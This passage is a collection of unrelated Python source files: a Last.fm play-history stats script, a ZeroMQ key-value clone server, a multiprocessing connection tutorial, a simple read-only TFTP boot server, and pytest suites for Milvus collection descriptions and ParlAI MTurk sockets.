open(day_file_path, "ab+").close()
if (
not os.path.getsize(day_file_path) > 0
or date == datetime.today()
or (
date == datetime.today() - relativedelta(days=1)
and datetime.today().time().hour < self.timezone_diff
)
):
self.process_day(date)
return day_file_path
def write_all_files(self, year=None):
"""
Writes track data for each day on this day from join date until today
"""
date = self.stats_date
if year:
date = date.replace(year=year)
day_file_path = self.get_date_filename(date.date())
day_file_path = "{path}/{date}.csv".format(
path=self.file_path, date=date.date()
)
try:
open(day_file_path, "r+")
except IOError:
for f in os.listdir(self.file_path):
if os.path.isfile(f):
os.remove(f)
new_day = True
while True:
if self.timezone_diff == 0:
self.write_day_file(date)
else:
day_before = date - relativedelta(days=1)
day_before_file_path = self.get_date_filename(day_before)
try:
open(day_file_path, "r+")
except IOError:
new_day = True
try:
open(day_before_file_path, "r+")
except Exception:
new_day = True
self.write_day_file(date)
if new_day:
if self.timezone_diff != 0:
self.first_n_hours(date=date)
new_day = False
if year:
break
date = date - relativedelta(years=1)
if date.date() < self.join_date:
break
@classmethod
def st_to_dict(cls, line):
track_dict = {}
if line == "0":
return 0
artist = line.split(":")[0]
time = line.split(":", 1)[1]
track_dict[artist] = time
return track_dict
def most_played_artist(self, date):
day_file_path = self.get_date_filename(date)
# print(day_file_path)
today_file = open(day_file_path, "r+")
track_dict = {}
artists = {}
for line in today_file:
if line == "\n":
continue
if line == "0":
return 0
track = line.split(":", 1)[0]
time = line.split(":", 1)[1]
if track_dict.get(track):
date_list = track_dict.get(track)
date_list.append(time.strip("["))
track_dict[track] = date_list
else:
track_dict[track] = [time]
for track in track_dict:
date_list = track_dict.get(track)
count = 0
for dat in date_list:
count += dat.count("am") + dat.count("pm")
track = track.split("\xe2\x80\x94")[0]
if track[0] == "0":
track = track[1:]
artists[track] = artists.get(track, 0) + count
day_list = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
weekday = day_list[date.weekday()]
today_file.close()
artist = (
max(artists, key=artists.get).replace("'", "`") if artists else None
)
count = artists.get(max(artists, key=artists.get)) if artist else 0
return "{date} ({weekday}): {artist} ({count})".format(
date=date.year, artist=artist, count=count, weekday=weekday
)
def yearly_most_played_artists(self):
date = self.stats_date.date()
while True:
most_played = self.most_played_artist(date)
if most_played:
print(most_played)
date = date - relativedelta(years=1)
if date < self.join_date:
break
@staticmethod
def seconds_to_time(seconds):
hours = seconds // 60
minutes = seconds % 60
return "{h}:{m}".format(h=hours, m=minutes)
def around_this_time(self, date):
day_file_path = self.get_date_filename(date)
# print(day_file_path)
# day_file_path = "{path}/{date}.csv".format(path=self.file_path, date=date.day())
day_file = open(day_file_path, "r+")
times = {}
now = self.stats_date
seconds_passed_today = now.hour * 60 + now.minute
track_dict = {}
track_time_dict = {} # maps seconds passed to actual play times
for line in day_file:
if line == "\n":
continue
if line == "0":
return 0
track = line.split(":")[0]
if track[0] == "0":
track = track[1:]
track_time_dict[track] = []
date = line.split(":", 1)[1].lstrip().rstrip()
if track_dict.get(track):
date_list = track_dict.get(track)
date_list.append(date)
track_dict[track] = date_list
else:
track_dict[track] = [date]
date_list = track_dict.get(track)
for date in date_list:
if len(date) > 33:
for i in date.split(","):
if len(i) < 12:
time = i[1:8]
if time[len(time) - 1 :] == "'":
time = time[:6]
time = datetime.strptime(time, "%I:%M%p") + relativedelta(
hours=self.timezone_diff
)
time = time.time()
seconds_passed = time.hour * 60 + time.minute
track_time_dict[seconds_passed] = time
times[seconds_passed] = track
else:
time = date[len(date) - 9 : len(date) - 2]
if time[0] == " ":
time = time[1:]
time = datetime.strptime(time, "%I:%M%p") + relativedelta(
hours=self.timezone_diff
)
time = time.time()
seconds_passed = time.hour * 60 + time.minute
track_time_dict[seconds_passed] = time
times[seconds_passed] = track
diff_times = {}
for s in list(times.keys()):
diff = abs(seconds_passed_today - int(s))
diff_times[times.get(s)] = diff
track = min(diff_times, key=diff_times.get) if diff_times else None
return {"track": track}
def yearly_around_this_time(self):
date = self.stats_date.date()
while True:
played_nowish = self.around_this_time(date)
if type(played_nowish) != dict:
break
if played_nowish.get("track"):
song = played_nowish.get("track").replace("'", "`")
else:
continue
if played_nowish:
print("{year}: {song}".format(year=date.year, song=song))
date = date - relativedelta(years=1)
if date < self.join_date:
break
def first_n_hours(self, date):
"""
When the response from last.fm is in a different time zone than ours,
we need to do some grotesque hacking.
:param date:
:return:
"""
day_before = date - relativedelta(days=1)
day_before_songs = self.write_day_file(day_before)
song_dict = {}
if type(day_before_songs) == str:
song_file = open(day_before_songs, "r+")
for song in song_file:
d = self.st_to_dict(song)
if d == 0:
return []
song_dict[list(d.keys())[0]] = list(d.values())[0]
else:
for song in day_before_songs:
if day_before_songs[0].get("track"):
date_list = song.get("date")
song_dict[song.get("track")] = date_list
else:
song_dict[song.get("track")] = [song.get("date")]
late_night_songs = {}
for song in song_dict:
times = song_dict.get(song)
times_played = []
late_night_songs[song] = []
for time in times.split("'"):
if "[" not in time and "]" not in time and len(time) > 3:
times_played.append(time)
if datetime.strptime(
time.lstrip().rstrip(), "%A %d %b %Y, %I:%M%p"
).time().hour >= (24 - self.timezone_diff):
late_night_songs[song].append(time)
day_file_path = self.get_date_filename(date)
day_file = open(day_file_path, "a+")
for song in late_night_songs:
if len(late_night_songs.get(song)) > 0:
line = "{song}: {time}\n".format(
song=song, time=late_night_songs.get(song)
)
day_file.write(line)
day_file.close()
return late_night_songs
def all_artists_that_day(self, date):
day_file_path = self.get_date_filename(date.date())
day_file = open(day_file_path, "r+")
track_dict = {}
artists = {}
for line in day_file:
if line == "\n":
continue
if line == "0":
return 0
track = line.split(":", 1)[0]
times = line.split(":", 1)[1]
if track_dict.get(track):
date_list = track_dict.get(track)
date_list.append(times)
track_dict[track] = date_list
else:
track_dict[track] = [times]
for track in track_dict:
times = track_dict.get(track)
play_count = 0
for dat in times:
play_count += dat.count("am") + dat.count("pm")
track = track.split("\xe2\x80\x94")[0]
if "0" in track[0]:
artists[track[1:]] = artists.get(track[1:], 0) + play_count
else:
artists[track] = artists.get(track, 0) + play_count
day_file.close()
return artists
def yearly_all_artists(self):
date = self.stats_date.date()
while True:
artists = self.all_artists_that_day(date)
if artists:
print("* - {year} - *".format(year=date.year))
for artist in sorted(artists, key=artists.__getitem__, reverse=True):
print(
"\t{artist}: {plays}".format(
artist=artist.replace("'", "`"),
plays=artists.get(artist),
)
)
total = 0
for count in artists:
total += artists.get(count)
print(" - \n\tTotal tracks: {total}".format(total=total))
date = date - relativedelta(years=1)
if date < self.join_date:
break
@classmethod
def run(cls):
start_time = datetime.now()
username = SetUsername.set_username()
print("Getting music stats for {0}".format(username))
user_data = get_lastfm_user_data(username)
lastfm_user = LastHop(
username=username,
real_name=user_data.get("real_name"),
join_date=user_data.get("join_date"),
total_tracks=user_data.get("total_tracks"),
)
lastfm_user.user_stats()
jobs = []
for i in range(user_data.get("join_date").year, datetime.today().year + 1):
p = multiprocessing.Process(target=lastfm_user.write_all_files, args=(i,))
jobs.append(p)
p.start()
for job in jobs:
job.join()
lastfm_user.stats_date = datetime.today()
lastfm_user.music_stats()
end_time = datetime.now()
total = end_time - start_time
print("(took {time} seconds)".format(time=total.seconds))
def get_lastfm_user_data(username):
api_key = Config.API_KEY
api_url = "http://ws.audioscrobbler.com/2.0/?method=user.getinfo&user={user}&api_key={api_key}&format=json".format(
user=username, api_key=api_key
)
api_response = json.loads(urllib.request.urlopen(api_url).read())
join_date = datetime.fromtimestamp(
float(api_response.get("user").get("registered").get("unixtime"))
)
real_name = api_response.get("user").get("realname")
total_tracks = api_response.get("user").get("playcount")
return {
"join_date": join_date,
"real_name": real_name,
"total_tracks": total_tracks,
}
if __name__ == "__main__":
LastHop.run()
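# The day window that process_day() sends to the Last.fm API is simply local
# midnight-to-midnight expressed as Unix timestamps. The same logic as a
# standalone sketch, without any class state:
#
#   from datetime import datetime
#
#   def day_epoch_window(day: datetime):
#       start = day.replace(hour=0, minute=0, second=0, microsecond=0)
#       end = start.replace(hour=23, minute=59, second=59)
#       return int(start.timestamp()), int(end.timestamp())
#
#   # e.g. day_epoch_window(datetime.now()) -> (from_epoch, to_epoch) for today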
|
clonesrv2.py
|
"""
Clone server Model Two
Author: Min RK <benjaminrk@gmail.com>
"""
import random
import threading
import time
import zmq
from kvsimple import KVMsg
from zhelpers import zpipe
def main():
# Prepare our context and publisher socket
ctx = zmq.Context()
publisher = ctx.socket(zmq.PUB)
publisher.bind("tcp://*:5557")
updates, peer = zpipe(ctx)
manager_thread = threading.Thread(target=state_manager, args=(ctx,peer))
manager_thread.daemon=True
manager_thread.start()
sequence = 0
random.seed(time.time())
try:
while True:
# Distribute as key-value message
sequence += 1
kvmsg = KVMsg(sequence)
kvmsg.key = "%d" % random.randint(1,10000)
kvmsg.body = "%d" % random.randint(1,1000000)
kvmsg.send(publisher)
kvmsg.send(updates)
except KeyboardInterrupt:
print " Interrupted\n%d messages out" % sequence
# simple struct for routing information for a key-value snapshot
class Route:
def __init__(self, socket, identity):
self.socket = socket # ROUTER socket to send to
self.identity = identity # Identity of peer who requested state
def send_single(key, kvmsg, route):
"""Send one state snapshot key-value pair to a socket
Hash item data is our kvmsg object, ready to send
"""
# Send identity of recipient first
route.socket.send(route.identity, zmq.SNDMORE)
kvmsg.send(route.socket)
def state_manager(ctx, pipe):
"""This thread maintains the state and handles requests from clients for snapshots.
"""
kvmap = {}
pipe.send("READY")
snapshot = ctx.socket(zmq.ROUTER)
snapshot.bind("tcp://*:5556")
poller = zmq.Poller()
poller.register(pipe, zmq.POLLIN)
poller.register(snapshot, zmq.POLLIN)
sequence = 0 # Current snapshot version number
while True:
try:
items = dict(poller.poll())
except (zmq.ZMQError, KeyboardInterrupt):
break # interrupt/context shutdown
# Apply state update from main thread
if pipe in items:
kvmsg = KVMsg.recv(pipe)
sequence = kvmsg.sequence
kvmsg.store(kvmap)
# Execute state snapshot request
if snapshot in items:
msg = snapshot.recv_multipart()
identity = msg[0]
request = msg[1]
if request == "ICANHAZ?":
pass
else:
print "E: bad request, aborting\n",
break
# Send state snapshot to client
route = Route(snapshot, identity)
# For each entry in kvmap, send kvmsg to client
for k,v in kvmap.items():
send_single(k,v,route)
# Now send END message with sequence number
print "Sending state shapshot=%d\n" % sequence,
snapshot.send(identity, zmq.SNDMORE)
kvmsg = KVMsg(sequence)
kvmsg.key = "KTHXBAI"
kvmsg.body = ""
kvmsg.send(snapshot)
if __name__ == '__main__':
main()
|
python3-54.py
|
#Communicating with processes
#Real time communications with processes
#Even on other machines
#Imports
import logging
import time
import multiprocessing
from multiprocessing import process
from multiprocessing.context import Process
from multiprocessing.connection import Listener, Client
logging.basicConfig(format='%(levelname)s - %(asctime)s: %(message)s',datefmt='%H:%M:%S', level=logging.DEBUG)
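# Listener/Client from multiprocessing.connection give an authenticated
# (HMAC challenge using authkey) connection over which picklable Python
# objects are exchanged with conn.send() / conn.recv().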
#Worker process
def proc(server='localhost',port=6000, password=b'password'):
name = process.current_process().name
    logging.info(f'{name} started')
#Start listening for connections
address = (server,port)
listener = Listener(address,authkey=password)
conn = listener.accept()
logging.info(f'{name}: connection from {listener.last_accepted}')
#Loop for input from the connected process
while True:
msg = conn.recv()
logging.info(f'{name} data in: {msg}')
if msg == 'quit':
conn.close()
break
listener.close()
logging.info(f'{name} finished')
#Main Function
def main():
name = process.current_process().name
logging.info(f'{name} started')
#Setup the process
address = 'localhost' #127.0.0.1
port = 2823 # above 1024
password = b'password'
p = Process(target=proc,args=[address,port,password],daemon=True,name="Worker")
p.start()
logging.info(f'{name} waiting on the worker...')
time.sleep(1)
#Connect to the process
dest = (address,port)
conn = Client(dest,authkey=password)
#Command loop
while True:
command = input('\r\nEnter a command or type quit:\r\n').strip()
logging.info(f'{name} command: {command}')
conn.send(command)
if command == 'quit':
break
#Cleanup and shutdown
    if p.is_alive():
logging.info(f'{name} terminating worker')
conn.close()
time.sleep(1)
p.terminate()
p.join()
logging.info(f'{name} finished')
if __name__ == "__main__":
main()
|
tftp.py
|
# import click
from socket import AF_INET, SOCK_DGRAM, socket
from struct import unpack, pack
from threading import Thread
from zipfile import ZipFile
import io
import os
from piman import logger
"""
This code was modified following Prof. Reed's suggestion.
"""
"""
The TFTPServer class encapsulates the methods required for running a simple TFTP server that handles only read requests
The server is initialized with a data directory, a port, and a connection address.
The data directory, port, and connection address are specified in the configuration file
(note: sudo must be used if using port 69)
"""
class TFTPServer:
RRQ_OPCODE = 1
DATA_OPCODE = 3
ACK_OPCODE = 4
ERROR_OPCODE = 5
OACK_OPCODE = 6
    # TFTP data packets consist of a 2-byte opcode, a 2-byte block number, and up to 512 bytes of data.
    # Since our server only ever receives RRQ and ACK packets, the buffer could be sized to the
    # largest RRQ we expect (filenames on Mac OSX can have up to 256 characters), but for better
    # practice it is set to the maximum TFTP data packet length.
BUFFER_SIZE = 516
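    # Packet layouts (RFC 1350):
    #   RRQ   = | opcode 1 | filename | 0 | mode | 0 | (optional options, RFC 2347)
    #   DATA  = | opcode 3 | block # | up to 512 bytes of data |
    #   ACK   = | opcode 4 | block # |
    #   ERROR = | opcode 5 | error code | error message | 0 |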
# ctor for setting configurable attributes
def __init__(self, data_dir, tftp_port, connection_address):
self.data_dir = data_dir
self.tftp_port = tftp_port
self.connection_address = connection_address
# opens install/boot in zipfile
def res_open(self, name):
zipfile = os.path.dirname(os.path.dirname(__file__))
fd = None
try:
with ZipFile(zipfile) as z:
fd = z.open("install/boot/" + name)
except KeyError:
logger.error("{}: key error - looking in filesystem next".format(name))
pass # we'll try looking in the filesystem next
if not fd:
fd = open("{}/{}".format(self.data_dir, name), "rb")
if 'cmdline.txt' in name and fd:
# we need to fixup the master address
content = fd.read()
fd.close()
fd = io.BytesIO(content.replace(b'MASTER', self.connection_address.encode()))
return fd
"""
Begins running the server thread
"""
def start(self):
self.server_socket = socket(AF_INET, SOCK_DGRAM)
# We can specify a specific address when running the server (defaults to '')
logger.info("connecting to {}:{}".format(self.connection_address, self.tftp_port))
self.server_socket.bind((self.connection_address, self.tftp_port))
logger.info("serving files from {} on port {}".format(self.data_dir, self.tftp_port))
self.tftp_thread = Thread(target=self.__process_requests, name="tftpd")
self.tftp_thread.start()
def stop(self):
self.server_socket.close()
"""
This code is responsible for handling requests (both valid and invalid) as well as ensuring data is transferred
properly and reliably.
"""
def __process_requests(self):
        # this while loop keeps our server running and ensures the initial
        # data packet is retrieved by the host; it accepts RRQs for files and
        # starts a thread to process each one
logger.info("TFTP waiting for request")
while True:
pkt, addr = self.server_socket.recvfrom(self.BUFFER_SIZE)
t1 = Thread(
target=self.__create_thread_and_process_requests, args=(pkt, addr))
t1.daemon = True
t1.start()
"""
This code is responsible for handling requests. It starts a new socket with an ephemeral port
for communication to the client. If no response is heard after 10 seconds, the socket is closed and function ends.
"""
def __create_thread_and_process_requests(self, pkt, addr):
        # initial block number, default block size, and variable for filename
        block_number = 0
        block_size = 512  # TFTP default; may be raised by a negotiated blksize option
        filename = ''
# prepare the UDP socket
client_dedicated_sock = socket(AF_INET, SOCK_DGRAM)
# bind to 0 for an ephemeral port
client_dedicated_sock.bind((self.connection_address, 0))
# set timeout for the socket
client_dedicated_sock.settimeout(10)
# RRQ is a series of strings, the first two being the filename
# and mode but there may also be options. see RFC 2347.
#
# we skip the first 2 bytes (the opcode) and split on b'\0'
# since the strings are null terminated.
#
# because b'\0' is at the end of all strings split will always
# give us an extra empty string at the end, so skip it with [:-1]
strings_in_RRQ = pkt[2:].split(b"\0")[:-1]
logger.info("got {} from {}".format(strings_in_RRQ, addr))
filename = strings_in_RRQ[0]
# opens the file once for the socket, opening multiple times causes tftp to be slow
try:
transfer_file = self.res_open(strings_in_RRQ[0].decode())
while True:
# the first two bytes of all TFTP packets is the opcode, so we can
# extract that here. the '!' is for big endian, and 'H' is to say it is an integer
[opcode] = unpack("!H", pkt[0:2])
if opcode == TFTPServer.RRQ_OPCODE:
                    if len(strings_in_RRQ) > 4:
                        t_size = 0
                        for index, string in enumerate(strings_in_RRQ[2:]):
                            if string.decode() == 'tsize':
                                temp_file = self.res_open(filename.decode())
                                temp_file.seek(0, 2)
                                t_size = temp_file.tell()
                                temp_file.close()
                            if string.decode() == 'blksize':
                                # the enumeration starts at strings_in_RRQ[2], so the
                                # option's value lives at index + 3 in the full list
                                block_size = int(strings_in_RRQ[index + 3])
                        # construct the OACK; RFC 2348 option values are ASCII strings
                        transfer_ack_opcode = pack("!H", TFTPServer.OACK_OPCODE)
                        oack_data = b'tsize\0' + str(t_size).encode() + b'\0'
                        oack_data += b'blksize\0' + str(block_size).encode() + b'\0'
packet = transfer_ack_opcode + oack_data
client_dedicated_sock.sendto(packet, addr)
# set the opcode for the packet we are sending
transfer_opcode = pack("!H", TFTPServer.DATA_OPCODE)
                    # read up to block_size bytes of data (512 unless a larger
                    # blksize was negotiated)
                    data = transfer_file.read(block_size)
# if data is received increment block number, contruct the packet, and send it
if data:
block_number += 1
transfer_block_number = pack("!H", block_number)
packet = transfer_opcode + transfer_block_number + data
client_dedicated_sock.sendto(packet, addr)
# ACK received, so we can now read the next block, if it doesn't match resend the previous block of data
elif opcode == TFTPServer.ACK_OPCODE:
[acked_block] = unpack("!H", pkt[2:4])
# block number matches, the block sent was successfully received
if acked_block == block_number:
                        # honor the negotiated block size for every block, not just the first
                        data = transfer_file.read(block_size)
# if data read, increment block number, construct packet, and send it on the socket
if data:
block_number += 1
transfer_block_number = pack("!H", block_number)
packet = transfer_opcode + transfer_block_number + data
client_dedicated_sock.sendto(packet, addr)
# if no data was read, read returns b'', then EOF was reached and download complete
else:
# sending a packet of zero data - to acknowledge end of transfer
block_number += 1
transfer_block_number = pack("!H", block_number)
packet = transfer_opcode + transfer_block_number
client_dedicated_sock.sendto(packet, addr)
logger.warning('download complete, closing socket')
client_dedicated_sock.close()
break
                    # if the block number doesn't match, the last data packet was not received;
                    # resend the data that was already read - no seek or extra read is needed,
                    # which keeps the transfer fast
elif block_number != acked_block:
# decrement block number
block_number = block_number - 1
transfer_block_number = pack("!H", block_number)
packet = transfer_opcode + transfer_block_number + data
client_dedicated_sock.sendto(packet, addr)
else:
# form an error packet and send it to the invalid TID
error_opcode = pack("!H", TFTPServer.ERROR_OPCODE)
error_code = pack("!H", 21)
error_message = b"incorrect TID\0"
logger.error("incorrect TID")
packet = error_opcode + error_code + error_message
client_dedicated_sock.sendto(packet, addr)
else:
# form an error packet and send it to the invalid TID
error_opcode = pack("!H", TFTPServer.ERROR_OPCODE)
error_code = pack("!H", 20)
error_message = b"illegal operation specified\0"
logger.error("illegal operation specified")
packet = error_opcode + error_code + error_message
client_dedicated_sock.sendto(packet, addr)
# listen for a client response for 10 seconds
# close everything and terminate if no response
try:
pkt, addr = client_dedicated_sock.recvfrom(
self.BUFFER_SIZE)
                except OSError:  # socket.timeout is a subclass of OSError
logger.error("Socket Timed Out")
client_dedicated_sock.close()
logger.error('closed socket')
break
except FileNotFoundError:
# send an error packet to the requesting host
error_opcode = pack("!H", TFTPServer.ERROR_OPCODE)
error_code = pack("!H", 17)
error_message = b"No such file within the directory\0"
logger.error("No such file within the directory")
packet = error_opcode + error_code + error_message
client_dedicated_sock.sendto(packet, addr)
client_dedicated_sock.close()
def join(self):
self.tftp_thread.join()
def do_tftpd(data_dir, connection_address, tftp_port):
""" this is a simple TFTP server that will listen on the specified
    port and serve data rooted at the specified data directory. Only read
requests are supported for security reasons.
"""
logger.warning("Starting TFTP...")
srvr = TFTPServer(data_dir, tftp_port, connection_address)
srvr.start()
srvr.join()
logger.warning("TFTP is terminating")
if __name__ == "__main__":
do_tftpd()
|
test_describe_collection.py
|
import pytest
import logging
import time
from utils import *
from constants import *
uid = "describe_collection"
class TestDescribeCollection:
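    """Tests for `describe_collection`, covering empty collections, collections
    with data, indexes, disconnected clients, and multithreaded access."""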
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
"""
******************************************************************
The following cases are used to test `describe_collection` function, no data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_collection_fields(self, connect, get_filter_field, get_vector_field):
'''
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
'''
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_describe_collection_after_index_created(self, connect, collection, get_simple_index):
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
assert index["index_type"] == get_simple_index["index_type"]
assert index["metric_type"] == get_simple_index["metric_type"]
assert index["params"] == get_simple_index["params"]
@pytest.mark.level(2)
def test_describe_collection_without_connection(self, collection, dis_connect):
'''
target: test get collection info, without connection
method: calling get collection info with correct params, with a disconnected instance
expected: get collection info raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.describe_collection(collection)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_describe_collection_not_existed(self, connect):
'''
target: test if collection not created
method: random a collection name, create this collection then drop it,
assert the value returned by describe_collection method
expected: False
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.describe_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.describe_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.level(2)
def test_describe_collection_multithread(self, connect):
'''
target: test create collection with multithread
method: create collection using multithread,
expected: collections are created
'''
threads_num = 4
threads = []
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
def get_info():
connect.describe_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=get_info)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
"""
******************************************************************
The following cases are used to test `describe_collection` function, and insert data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_describe_collection_fields_after_insert(self, connect, get_filter_field, get_vector_field):
'''
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
'''
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
entities = gen_entities_by_fields(fields["fields"], default_nb, vector_field["params"]["dim"])
res_ids = connect.insert(collection_name, entities)
connect.flush([collection_name])
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
class TestDescribeCollectionInvalid(object):
"""
Test describe collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_describe_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
@pytest.mark.level(2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_describe_collection_with_empty_or_None_collection_name(self, connect, collection_name):
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
|
test_full_system.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import time
import uuid
import os
from unittest import mock
from parlai.mturk.core.socket_manager import Packet, SocketManager
from parlai.mturk.core.agents import AssignState
from parlai.mturk.core.mturk_manager import MTurkManager
from parlai.core.params import ParlaiParser
import parlai.mturk.core.mturk_manager as MTurkManagerFile
import parlai.mturk.core.data_model as data_model
import parlai.mturk.core.shared_utils as shared_utils
import threading
from websocket_server import WebsocketServer
import json
parent_dir = os.path.dirname(os.path.abspath(__file__))
MTurkManagerFile.parent_dir = os.path.dirname(os.path.abspath(__file__))
MTurkManagerFile.input = mock.MagicMock()
# Lets ignore the logging part
MTurkManagerFile.shared_utils.print_and_log = mock.MagicMock()
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_WORKER_ID_2 = 'TEST_WORKER_ID_2'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_ASSIGNMENT_ID_2 = 'TEST_ASSIGNMENT_ID_2'
TEST_ASSIGNMENT_ID_3 = 'TEST_ASSIGNMENT_ID_3'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_HIT_ID_2 = 'TEST_HIT_ID_2'
TEST_CONV_ID_1 = 'TEST_CONV_ID_1'
FAKE_ID = 'BOGUS'
MESSAGE_ID_1 = 'MESSAGE_ID_1'
MESSAGE_ID_2 = 'MESSAGE_ID_2'
MESSAGE_ID_3 = 'MESSAGE_ID_3'
MESSAGE_ID_4 = 'MESSAGE_ID_4'
COMMAND_ID_1 = 'COMMAND_ID_1'
MESSAGE_TYPE = data_model.MESSAGE_TYPE_MESSAGE
COMMAND_TYPE = data_model.MESSAGE_TYPE_COMMAND
MESSAGE_1 = {'message_id': MESSAGE_ID_1, 'type': MESSAGE_TYPE}
MESSAGE_2 = {'message_id': MESSAGE_ID_2, 'type': MESSAGE_TYPE}
COMMAND_1 = {'message_id': COMMAND_ID_1, 'type': COMMAND_TYPE}
AGENT_ID = 'AGENT_ID'
ACT_1 = {'text': 'THIS IS A MESSAGE', 'id': AGENT_ID}
ACT_2 = {'text': 'THIS IS A MESSAGE AGAIN', 'id': AGENT_ID}
active_statuses = [
AssignState.STATUS_NONE, AssignState.STATUS_ONBOARDING,
AssignState.STATUS_WAITING, AssignState.STATUS_IN_TASK,
]
complete_statuses = [
AssignState.STATUS_DONE, AssignState.STATUS_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT_EARLY,
AssignState.STATUS_EXPIRED, AssignState.STATUS_RETURNED,
]
statuses = active_statuses + complete_statuses
TASK_GROUP_ID_1 = 'TASK_GROUP_ID_1'
SocketManager.DEF_MISSED_PONGS = 1
SocketManager.HEARTBEAT_RATE = 0.4
SocketManager.DEF_DEAD_TIME = 0.4
SocketManager.ACK_TIME = {Packet.TYPE_ALIVE: 0.4,
Packet.TYPE_MESSAGE: 0.2}
shared_utils.THREAD_SHORT_SLEEP = 0.05
shared_utils.THREAD_MEDIUM_SLEEP = 0.15
MTurkManagerFile.WORLD_START_TIMEOUT = 2
TOPIC_ARN = 'topic_arn'
QUALIFICATION_ID = 'qualification_id'
HIT_TYPE_ID = 'hit_type_id'
MTURK_PAGE_URL = 'mturk_page_url'
FAKE_HIT_ID = 'fake_hit_id'
def assert_equal_by(val_func, val, max_time):
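    """Poll val_func until it returns val, failing if max_time seconds elapse."""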
start_time = time.time()
while val_func() != val:
assert time.time() - start_time < max_time, \
"Value was not attained in specified time"
time.sleep(0.1)
class MockSocket():
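    """Fake websocket endpoint standing in for the MTurk routing server: it
    acknowledges WORLD_ALIVE packets, answers heartbeats with pongs, and
    dispatches other packets to per-agent handlers registered in self.handlers."""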
def __init__(self):
self.last_messages = {}
self.connected = False
self.disconnected = False
self.closed = False
self.ws = None
self.should_heartbeat = True
self.fake_workers = []
self.port = None
self.launch_socket()
self.handlers = {}
while self.ws is None:
time.sleep(0.05)
time.sleep(1)
def send(self, packet):
self.ws.send_message_to_all(packet)
def close(self):
if not self.closed:
self.ws.server_close()
self.ws.shutdown()
self.closed = True
def do_nothing(self, *args):
pass
def launch_socket(self):
def on_message(client, server, message):
if self.closed:
raise Exception('Socket is already closed...')
if message == '':
return
packet_dict = json.loads(message)
if packet_dict['content']['id'] == 'WORLD_ALIVE':
self.ws.send_message(
client, json.dumps({'type': 'conn_success'}))
self.connected = True
elif packet_dict['content']['type'] == 'heartbeat':
pong = packet_dict['content'].copy()
pong['type'] = 'pong'
self.ws.send_message(client, json.dumps({
'type': data_model.SOCKET_ROUTE_PACKET_STRING,
'content': pong,
}))
if 'receiver_id' in packet_dict['content']:
receiver_id = packet_dict['content']['receiver_id']
assignment_id = packet_dict['content']['assignment_id']
use_func = self.handlers.get(
receiver_id + assignment_id, self.do_nothing)
use_func(packet_dict['content'])
def on_connect(client, server):
pass
def on_disconnect(client, server):
self.disconnected = True
def run_socket(*args):
port = 3030
while self.port is None:
try:
self.ws = WebsocketServer(port, host='127.0.0.1')
self.port = port
except OSError:
port += 1
self.ws.set_fn_client_left(on_disconnect)
self.ws.set_fn_new_client(on_connect)
self.ws.set_fn_message_received(on_message)
self.ws.run_forever()
self.listen_thread = threading.Thread(
target=run_socket,
name='Fake-Socket-Thread'
)
self.listen_thread.daemon = True
self.listen_thread.start()
class MockAgent(object):
